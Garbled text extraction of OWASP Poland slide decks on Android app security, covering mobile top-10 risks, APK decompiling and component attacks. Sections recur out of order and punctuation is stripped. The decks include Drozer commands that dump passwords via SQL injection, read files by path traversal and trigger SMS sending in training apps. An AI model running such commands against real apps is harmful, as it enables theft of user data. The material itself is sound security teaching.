dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Linksbull httpdeveloperandroidcomaboutdashboardsindexhtmlbull httpsdocsgooglecompresentationd1YDYUrD22Xq12nKkhBfwoJBfw2Q-OReMr0BrDfHyfyPwpub
start=falseamploop=falseampdelayms=3000ampslide=idg1202bd8e5_0193bull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpnewssoftpediacomnewsGoogle-Introduces-Android-L-Developer-Preview-Material-Design-ART-64-Bit-Support-Volta-448367shtmlbull httpdeveloperandroidcomtoolsbuildingindexhtmlbull httpandroid-anythingdiandiancompost2011-09-285377936bull httpwwwvogellacomtutorialsAndroidarticlehtmlandroiddevelopment_artbull httpssourceandroidcomdevicestechdalvikindexhtmlbull httpsenwikipediaorgwikiAndroid_Runtimebull httpssourceandroidcomdevicestechdalvikgc-debughtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwjavatpointcominternal-details-of-hello-android-examplebull httpsdecompileandsecureapkwordpresscom20140510decompile-and-secure-android-apkbull httpdeveloperandroidcomtoolsdebuggingdebugging-memoryhtmlLogMessagesbull httpssourceandroidcomdevicesbull httpwwwcubridorgblogdev-platformandroid-at-a-glancebull httpdeveloperandroidcomtrainingarticlessecurity-tipshtmlbull httpsdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull httpssourceandroidcomsecurityoverviewapp-securityhtmlbull httpwwwcompiletimeerrorcom201212blog-posthtmlVsReZ_krKM-bull httpwwwslidesharenetSperasoftsperasoft-talks-android-security-threatsqid=d4d0db3a-0451-4150-95e0-dcd364cc95b4ampv=qf1ampb=ampfrom_search=8bull httpwwweazytutzcomandroidandroid-architecturebull httpwwwtutorialspointcomandroidandroid_architecturehtm
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
Sample manifest from GoatDroid
Broadcast receivers
Broadcast receivers attacks
public void onReceive(Context arg0 Intent arg1) context = arg0 SmsManager sms = SmsManagergetDefault() Bundle bundle = arg1getExtras() smssendTextMessage(bundlegetString(phoneNumber) null bundlegetString(message) null null) UtilsmakeToast(context ConstantsTEXT_MESSAGE_SENT ToastLENGTH_LONG)
The following is the code that determines how the receiver handles the orgowaspgoatdroidfourgoatsSOCIAL_SMS actions
Broadcast receivers
Broadcast receivers attacks
run appbroadcastsend --action orgowaspgoatdroidfourgoatsSOCIAL_SMS --component orgowaspgoatdroidfourgoats orgowaspgoatdroidfourgoatsbroadcastreceiversSendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
Broadcast receivers
General defenses for App Components
Applies for all abovementioned itemsbull Setting androidexported attribute to false
(only this user ID as the current app will be able to access the activity)
bull Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
Referencesbull httpdeveloperandroidcomguidecomponentsindexhtmlbull httpdeveloperandroidcomguidetopicsmanifestmanifest-introhtmlbull http
resourcesinfosecinstitutecomandroid-hacking-security-part-1-exploiting-securing-application-components
bull httpresourcesinfosecinstitutecomandroid-hacking-security-part-2-content-provider-leakagebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-3-exploiting-broadcast-receiversbull httpyinzhicaoorgcoursesf15cse343443slidesmobilesecuritypdfbull httpswwwsafaribooksonlinecomlibraryviewandroid-security-cookbookbull httpswwwmwrinfosecuritycomsystemassets937originalmwri_drozer-user-guide_2015-03-23pdfbull httpsmanifestsecuritycomandroid-application-security-part-5bull httpsmanifestsecuritycomandroid-application-security-part-8bull httpswwweecsberkeleyedu~dawpapersintents-mobisys11pdfbull httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-applicationbull httpsgithubcomtanprathanMobileApp-Pentest-Cheatsheetandroid-application-penetration-testing
Thank you
bull For additional questions or just to stay in touch c0rdis
OWASP top 10 mobile risks
Pawel RzepaOWASP Poland24022016
Important notes
bull The goal of this presentation is to provide you a basic knowledge about mobile risks and easy methodology to find those risks in your applications
bull If you want to add anything importantinteresting and related to the topic ndash feel free to interrupt me )
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Application Components Security
Alexander AntukhOWASP Poland24022016
Android Application Security
Often the app contains some sensitive databull Passwordsbull Authentication tokensbull Contactsbull Communication recordsbull IP addresses or domain names to sensitive
services
Android Application Security
Global problems in securing the applicationsbull How sensitive data is storedndash Isolationndash Privilege separation
bull How sensitive data is transmittedndash Extra-device communicationndash Inter-application communicationndash Inter-component communication
Android Application Components
Activities Services
Content providers
Broadcast
receivers
Android Application Components
AndroidManifestxml defines in which way the app works and what kind of interaction between components and outer world is possible Permissions are set there too
bull Activities ndash ltactivitygtbull Services ndash ltservicegtbull Content providers ndash ltprovidergtbull Broadcast receivers ndash ltreceivergt
Android Manifest
Sample manifest fileNote the followingbull Permissions
ltuses-permission androidname=stringgtltpermission androidprotectionLevel=hellip gt
bull Components and their attributes
AndroidManifestxml
Android Manifest
Protection levelsbull dangerous ndash increased risk (directly affect users)bull normal ndash minimal risk (default value)bull signature ndash same certificatebull signatureOrSystem ndash same certificate || app in
Android system image
Android Manifest
bull debuggablebull enabledbull exportedbull permission
Activities Services
Content provider
s
Broadcast
receivers
Example components attributes
IntentsAn intent is a defined object used for messaging that is created and communicated to an intended application component It includes all relevant information about calling application desired application component and request actionsdata
Intent intent = new Intent(IntentACTION_VIEW) intentsetData(Uriparse(httpwwwgooglecom)) String pack = comandroidbrowser ComponentName comp = new ComponentName(pack pack + BrowserActivity)intentsetComponent(comp)
startActivity(intent)
Drozer
Open source tool to interact with other applications through IPC - leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer you donrsquot need to write your apps to interact with other apps )
dzgt run appactivitystart --action androidintentactionVIEW --data-uri httpwwwgooglecom --component comandroidbrowser comandroidbrowserBrowserActivity
DrozerIs installed in a default package of AppUse with adb so enough just bdquoclick-and-playrdquo
Activity components
An Activity provides a screen with which users can interact in order to do something Users can perform operations such as making a call sending an SMS etc
Example login screen of your Facebook app
Activities
Activity components attacks
bull If an activity can be triggered by other apps (by an attacker) it can be abused
bull Launching by intents itrsquos possible to achieve the followingndash Modify data in backgroundndash Tricking the userndash Leaking sensitive information
Activities
Activity components attacksbull General hijacking scheme
bull Results of an attackndash Malicious Activity could read the data in the Intent and then
immediately relay it to a legitimate onendash Spoofing the expected Activityrsquos user interface to steal user-supplied
data (phishing)
A B
E
Activities
Activity components attacks Activities
bull List and launch exported activities
dzgt run appactivityinfo -a commwrexamplesieve Package commwrexamplesieve commwrexamplesieveFileSelectActivity commwrexamplesieveMainLoginActivity commwrexamplesievePWList
dzgt run appactivitystart --component commwrexamplesieve commwrexamplesievePWList
Activity components demo Activities
Services
A Service can perform long-running operations in the background and does not provide a user interface Other components can bind to a Service which lets the binder invoke methods that are declared in the target Servicersquos interface Intents are used to start and bind to Services
Example playing music or downloading a file
Services
Services attacks
Although generally donrsquot seem dangerous they could potentially perform sensitive operations
To attack a service one need interaction (it must be exported or respondaccept input from message formats like intents files or the network stack)
Services
Services attacks
Typical attacks Denial of Service and Information Leakage
bull Find exported servicesbull Launch them one-by-one with logcat to check
for sensitive infobull Fire off intents and wait for it
Services
Content providers
A content provider presents data to external applications as one or more tables In other words content providers can be treated as interfaces that connect data in one process with code running in another process
Example using content providers any app can read SMS from inbuilt SMS apprsquos repository in our device
Content providers
Content providers
bull What info can they holdndash Userrsquos phone numbersndash Passwordsndash SMS
bull And one of the main problems are again permissions
run appproviderinfo --permission null
Content providers
Content providers attacks
bull Unrestricted access to app databasendash Just query it ndash run appproviderquery contentsettingssecure
bull SQL injectionbull Path traversal
Other attack vectors on auth might include altering data eg by using appproviderinsert command
Content providers
dzgt run scannerproviderinjection -a commwrexamplesieve
Content providers attacks
bull Unrestricted access to app database
Content providers
dzgt run scannerproviderfinduris -a commwrexamplesieve Accessible content URIs contentcommwrexamplesieveDBContentProviderKeys contentcommwrexamplesieveDBContentProviderPasswordscontentcommwrexamplesieveDBContentProviderPasswords
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --vertical
Content providers attacks
bull SQL injection
Content providers
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --selection unrecognized token ) (code 1) while compiling SELECT FROM Passwords WHERE ()
dzgt run appproviderquery contentcommwrexamplesieveDBContentProviderPasswords --projection FROM Key--| Password | pin || thisismypassword | 9876 |
Content providers attacks
bull Path traversal
Content providers
One interesting real-life example httpblogsegueseccom201209path-traversal-vulnerability-on-shazam-android-application
dzgt run appproviderread contentcommwrexamplesieveFileBackupProvideretchosts127001 localhost
dzgt run appproviderdownload contentcommwrexamplesieveFileBackupProviderdatadatacommwrexamplesie vedatabasesdatabasedb homeuserdatabasedbWritten 24576 bytes
Content providers demo Content providers
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low boot completed headset plug etc Though most of the broadcast receivers are originated by the system applications can also announce broadcasts
Broadcast receivers
Broadcast receivers
bull If receiver accepts broadcasts from untrusted sources app is at risk
Broadcast receivers
Broadcast receivers attacks
Typical fail authorization
bull Enumerate receiversbull Determine how the receiver handles the
actionbull Send intent and enjoy
Broadcast receivers
Broadcast receivers attacks
ltreceiver androidname=broadcastreceiversSendSMSNowReceiverrdquoandroidlabel=Send SMS gt ltintent-filtergt
ltaction androidname=orgowaspgoatdroidfourgoatsSOCIAL_SMS gt ltintent-filtergtltreceivergthellipltuses-permission androidname=androidpermissionSEND_SMS gt
